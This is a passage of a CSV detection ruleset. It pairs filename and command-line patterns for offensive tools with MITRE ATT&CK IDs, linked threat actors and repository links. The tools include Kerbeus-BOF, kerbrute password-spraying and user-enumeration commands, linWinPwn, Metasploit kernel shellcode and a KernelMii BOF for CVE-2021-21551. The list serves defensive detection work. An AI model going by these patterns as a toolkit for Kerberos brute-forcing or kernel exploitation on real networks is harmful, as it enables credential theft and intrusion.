Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50348" "*kerbeus_havoc.py*",".{0,1000}kerbeus_havoc\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50349" 
"*Kerbeus-BOF-main*",".{0,1000}Kerbeus\-BOF\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50350" "*kerbrute -*",".{0,1000}kerbrute\s\-.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50351" "*kerbrute bruteuser *",".{0,1000}kerbrute\sbruteuser\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50352" "*kerbrute passwordspray *",".{0,1000}kerbrute\spasswordspray\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50353" "*kerbrute userenum *",".{0,1000}kerbrute\suserenum\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50354" "*kerbrute userenum *",".{0,1000}kerbrute\suserenum\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50355" 
"*kerbrute*bruteforce*",".{0,1000}kerbrute.{0,1000}bruteforce.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50356" "*kerbrute.go*",".{0,1000}kerbrute\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50357" "*kerbrute/cmd*",".{0,1000}kerbrute\/cmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50358" "*kerbrute/util*",".{0,1000}kerbrute\/util.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50359" "*kerbrute_*.exe*",".{0,1000}kerbrute_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50360" "*kerbrute_darwin_386*",".{0,1000}kerbrute_darwin_386.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","#linux","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50361" "*kerbrute_darwin_amd64*",".{0,1000}kerbrute_darwin_amd64.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","#linux","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50362" "*kerbrute_enum*",".{0,1000}kerbrute_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50363" "*kerbrute_linux*",".{0,1000}kerbrute_linux.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","#linux","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50364" "*kerbrute_pass_output_*",".{0,1000}kerbrute_pass_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50365" "*kerbrute_user_output_*",".{0,1000}kerbrute_user_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory 
Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50366" "*kerbrute_userpass_wordlist_*",".{0,1000}kerbrute_userpass_wordlist_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50367" "*kerbrute_windows*",".{0,1000}kerbrute_windows.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50368" "*kerbrute_windows_386.exe*",".{0,1000}kerbrute_windows_386\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50369" "*kerbrute_windows_amd64.exe*",".{0,1000}kerbrute_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50370" 
"*kerbrute-master*",".{0,1000}kerbrute\-master.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50371" "*KerbruteSession*",".{0,1000}KerbruteSession.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50372" "*kernel_shellcode.asm*",".{0,1000}kernel_shellcode\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50373" "*kernelcallbacktable.x64*",".{0,1000}kernelcallbacktable\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 
- Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50374" "*kernelcallbacktable.x64*",".{0,1000}kernelcallbacktable\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50375" "*kernelcallbacktable.x86*",".{0,1000}kernelcallbacktable\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50376" "*kernelcallbacktable.x86*",".{0,1000}kernelcallbacktable\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","50377" "*KernelMii.cna*",".{0,1000}KernelMii\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50378" "*KernelMii.x64.exe*",".{0,1000}KernelMii\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50379" "*KernelMii.x64.o*",".{0,1000}KernelMii\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50380" "*KernelMii.x86.exe*",".{0,1000}KernelMii\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
